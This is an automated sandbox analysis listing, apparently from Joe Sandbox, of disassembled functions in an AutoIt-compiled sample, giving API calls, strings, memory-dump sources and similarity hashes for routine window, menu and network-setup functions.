Function 00F16A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00F16B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00F16B53

Strings

static, xrefs: 00F16AB3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: fec3c61e5fb7bbbf21b33a86e4871d00785522b8f484ab6121efbfdbb2e93a30
Instruction ID: 6e8c06f1d7a8f06506d3a22d631deb4a1fc2d85954ae62157052f3545226e589
Opcode Fuzzy Hash: fec3c61e5fb7bbbf21b33a86e4871d00785522b8f484ab6121efbfdbb2e93a30
Instruction Fuzzy Hash: B831A171100604AEDB10DF68DC40BFB77A9FF88764F10951DF9A9D7190DA35AC81E760

Function 00EF28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EF294C

Strings

0, xrefs: 00EF290A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f47a5de6ba274f2bf0bb5a393a0b11c5ce891111a8004f74ed7891d16d7838c9
Instruction ID: a8aaf28c1af782eae5dc4bc11579abd5c98dc9bbdef0d06a0596751b57f20c07
Opcode Fuzzy Hash: f47a5de6ba274f2bf0bb5a393a0b11c5ce891111a8004f74ed7891d16d7838c9
Instruction Fuzzy Hash: A631803160030D9BEB248E98C945BFEBBF5EF85354F14201DEB85B71A1E7B09944DB51

Function 00F039E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00F03A66

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Strings

, $, xrefs: 00F03AA6
AUTOITCALLVARIABLE%d, xrefs: 00F03A58

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: bd70dff82354ff39a4612dbf1246a8d7ab0651887c30d21605dd2d62dc73f355
Instruction ID: 66cf7043f59927995d7400617e6652bda087f04d05a28845b2d2009e0d2d513a
Opcode Fuzzy Hash: bd70dff82354ff39a4612dbf1246a8d7ab0651887c30d21605dd2d62dc73f355
Instruction Fuzzy Hash: 16219335700219ABCF14EF64CC81AAEB7F9AF49340F400455F955BB181DB34EA46EB61

Function 00F166D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00F16761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F1676C

Strings

Combobox, xrefs: 00F1672E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 95582f6f80700153771a18d805d9467ea08bf63568ffc52c68b0a746671731dc
Instruction ID: 13d693a69c303dee0873fd8e97ed1d3251159827bc19424b5d6cfc545cc9d087
Opcode Fuzzy Hash: 95582f6f80700153771a18d805d9467ea08bf63568ffc52c68b0a746671731dc
Instruction Fuzzy Hash: 6E119071700208AFEF11CF54DC80EEB3B6AEB483A8F104129F914D72D0DA759C91A7A0

Function 00F16C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00E91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00E91D73
Part of subcall function 00E91D35: GetStockObject.GDI32(00000011), ref: 00E91D87
Part of subcall function 00E91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E91D91

GetWindowRect.USER32(00000000,?), ref: 00F16C71
GetSysColor.USER32(00000012), ref: 00F16C8B

Strings

static, xrefs: 00F16C4E

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 0e4cb017ce4ebf21a4f2f45cfc01d4b63fb4c97a3671ff4c15d671f20fb6932b
Instruction ID: 4fb4ba6068c513bce64f9530d21d7a4d36cafc0d586ea0a27464b68b28f9c94a
Opcode Fuzzy Hash: 0e4cb017ce4ebf21a4f2f45cfc01d4b63fb4c97a3671ff4c15d671f20fb6932b
Instruction Fuzzy Hash: 50215972910209AFDF04DFA8CC45AFA7BA8FB08315F004628FD95D2250E635E890EB60

Function 00F16920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00F169A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00F169B1

Strings

edit, xrefs: 00F16986

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 71be112098f3df31c3218b01cec2afb2104f77b62090ed3ad6a664252fbd038d
Instruction ID: adf354999af6e5c44e259306e8a2cace4ae49301af9313b84de2222e2ff9bbc2
Opcode Fuzzy Hash: 71be112098f3df31c3218b01cec2afb2104f77b62090ed3ad6a664252fbd038d
Instruction Fuzzy Hash: 05116A71900208ABEB108F749C40AEB36AAEB053B8F904724F9A5D61E0C635DC95BB60

Function 00EF29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EF2A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00EF2A41

Strings

0, xrefs: 00EF2A18

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: d6003a674f2d0e3173fe73be7fbc9e7829e6d8a4280f9e870112fc77a34df90a
Instruction ID: 90f4064e63824bc8774abf30547aef85e6a7754865d2363204c37430e829affd
Opcode Fuzzy Hash: d6003a674f2d0e3173fe73be7fbc9e7829e6d8a4280f9e870112fc77a34df90a
Instruction Fuzzy Hash: 0511E932911A1CABCF30DB68DC45BFA77B8AB85304F046029EB59F7250D774AD09D791

Function 00F021D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00F0222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00F02255

Strings

<local>, xrefs: 00F0221D

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 28db9540d03e9c2abc0352fed5b329fbb4adbe5bd585b1850ed027b890c92907
Instruction ID: f53e0c0878ac4dd9a94ab7086df7f8e71b189671492fb686d33313d26e84ff05
Opcode Fuzzy Hash: 28db9540d03e9c2abc0352fed5b329fbb4adbe5bd585b1850ed027b890c92907
Instruction Fuzzy Hash: CB11E370901225BAEB648F918C88FFBFFA8FF16765F10822AF90446080D3705994F6F0

Function 00EE8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00EE8E73

Strings

ListBox, xrefs: 00EE8E3D
ComboBox, xrefs: 00EE8E12

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: b3d9750266289e180a4fdffa1635b88cd7c8eea5676a37beb10e6c067a02c974
Instruction ID: 67ab4d6912245572d3625f98682b5ed133185118c9304114c3df15fa545622c4
Opcode Fuzzy Hash: b3d9750266289e180a4fdffa1635b88cd7c8eea5676a37beb10e6c067a02c974
Instruction Fuzzy Hash: 1901F1B160135CAB9F25EBA1CC419FE77A8AF06320B141A29B879772E1EE31580CD650

Function 00EF8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00EF8DAC
__fread_nolock.LIBCMT ref: 00EF8DC1

Strings

EA06, xrefs: 00EF8DF3

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: 7553c312f6f39d17d18778be08aeaabb31921d6c58f9bb457087a77c2cf0661f
Instruction ID: d4394a0528e2610ab9a8e760972104b0239033de64263096e613dbd4e82eeb1a
Opcode Fuzzy Hash: 7553c312f6f39d17d18778be08aeaabb31921d6c58f9bb457087a77c2cf0661f
Instruction Fuzzy Hash: 6901B972D042187EDB28CAA8CC56EFE7BFCDF15311F00459AF552E2181E975E6048760

Function 00EE8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00EE8D6B

Strings

ListBox, xrefs: 00EE8D35
ComboBox, xrefs: 00EE8D0A

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 2ff0d44416b584735fb055f3154cd8e4c720cb2b3a48a5b1c25246dcb3a7c194
Instruction ID: 7e8eba6b12b875f62c2c51f5b834cfe59f9d500aabe1be1791bf3d01e20ed080
Opcode Fuzzy Hash: 2ff0d44416b584735fb055f3154cd8e4c720cb2b3a48a5b1c25246dcb3a7c194
Instruction Fuzzy Hash: 8601D4B1A4120CABDF25EBA1CE52AFE77EC9F15340F141029B849732D1DE215E0CD271

Function 00EE8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00E97DE1: _memmove.LIBCMT ref: 00E97E22

Part of subcall function 00EEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00EEAABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00EE8DEE

Strings

ListBox, xrefs: 00EE8DBA
ComboBox, xrefs: 00EE8D8F

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5894380933712f513e82521fbd20266b3bf263612e02593346cd1664953e2f27
Instruction ID: 8f8cd1563528182aac99995581ec6732e69e1b674f851094cb9a3169b84a09bd
Opcode Fuzzy Hash: 5894380933712f513e82521fbd20266b3bf263612e02593346cd1664953e2f27
Instruction Fuzzy Hash: 7201A7B1A4124DA7DF21E6A5CE46AFE77EC9F15340F145025B849B3291DE215E0CE271

Function 00EF4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00EF4F46
_wcscmp.LIBCMT ref: 00EF4F58

Strings

#32770, xrefs: 00EF4F52

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: abcbabc55cef9ad1a0e562615928491e540cd7e7313e198bc7e01733f4ecb284
Instruction ID: 65bc570da593335e0a5cafc77c3b8f2b2ec43dd49cae9e0f84c1c02e08ae33c6
Opcode Fuzzy Hash: abcbabc55cef9ad1a0e562615928491e540cd7e7313e198bc7e01733f4ecb284
Instruction Fuzzy Hash: E4E09B3260022C26D72096559C45AA7F7ECDB55B71F011156FD04D3051D5609A4587D1

Function 00ECB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00ECB314: _memset.LIBCMT ref: 00ECB321

Part of subcall function 00EB0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00ECB2F0,?,?,?,00E9100A), ref: 00EB0945

IsDebuggerPresent.KERNEL32(?,?,?,00E9100A), ref: 00ECB2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E9100A), ref: 00ECB303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00ECB2FE

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 0e7f4fbbbbeba3af4467f299800194afd2502d65d1159cfb70ac15921ce891ad
Instruction ID: 3008bbfd7b5aca120e5f73a55756f10ecd9834d7b257b6823df0da60280c2f0d
Opcode Fuzzy Hash: 0e7f4fbbbbeba3af4467f299800194afd2502d65d1159cfb70ac15921ce891ad
Instruction Fuzzy Hash: A9E09270200780CFD760DF28E5067867BE8AF40714F01892CE496D7251EBF5E449DBA1

Function 00EE7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00EE7C82

Part of subcall function 00EB3358: _doexit.LIBCMT ref: 00EB3362

Strings

AutoIt, xrefs: 00EE7C76
Error allocating memory., xrefs: 00EE7C7B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: e72b5b122de11e807915f086100fbdbf4e885288017239332a64f572c6d897b5
Instruction ID: 01b44cfa40477906408e1a77985c0085a333b7927353437466acdf96889f6e62
Opcode Fuzzy Hash: e72b5b122de11e807915f086100fbdbf4e885288017239332a64f572c6d897b5
Instruction Fuzzy Hash: 1BD02B323C431C36D21032B5AC07FCB7AC84F05B56F001011FF04790D349D1D48051EA

Function 00ED1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00ED1775

Part of subcall function 00F0BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00ED195E,?), ref: 00F0BFFE
Part of subcall function 00F0BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00F0C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00ED196D

Strings

WIN_XPe, xrefs: 00ED1788

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: 67dfb14d093cf88affc63675d53c5bf36c5e00e855648293d969682aeaf36eb7
Instruction ID: bb499206c93362afac853d27de25d344afe52582717c027075690338add80bac
Opcode Fuzzy Hash: 67dfb14d093cf88affc63675d53c5bf36c5e00e855648293d969682aeaf36eb7
Instruction Fuzzy Hash: 66F0A570804209EBDB15DB91C994AECBAB8AB09305F641096E112B61A1D7754E86EF60

Function 00F15998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F159AE
PostMessageW.USER32(00000000), ref: 00F159B5

Part of subcall function 00EF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF52BC

Strings

Shell_TrayWnd, xrefs: 00F159A7

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c57fbde8a11058427b3bd53f4d5cc686f969c5d521673fc564958e14092203b7
Instruction ID: defeddb2514ae289f402569030be9749aa451b8eebf19c22c7635a6b559303d8
Opcode Fuzzy Hash: c57fbde8a11058427b3bd53f4d5cc686f969c5d521673fc564958e14092203b7
Instruction Fuzzy Hash: 64D022323C0304BBF264BB309C0FFE77A20BB00B50F054834B30AEA0E1C8E0A800D654

Function 00F15964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F1596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00F15981

Part of subcall function 00EF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00EF52BC

Strings

Shell_TrayWnd, xrefs: 00F15967

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
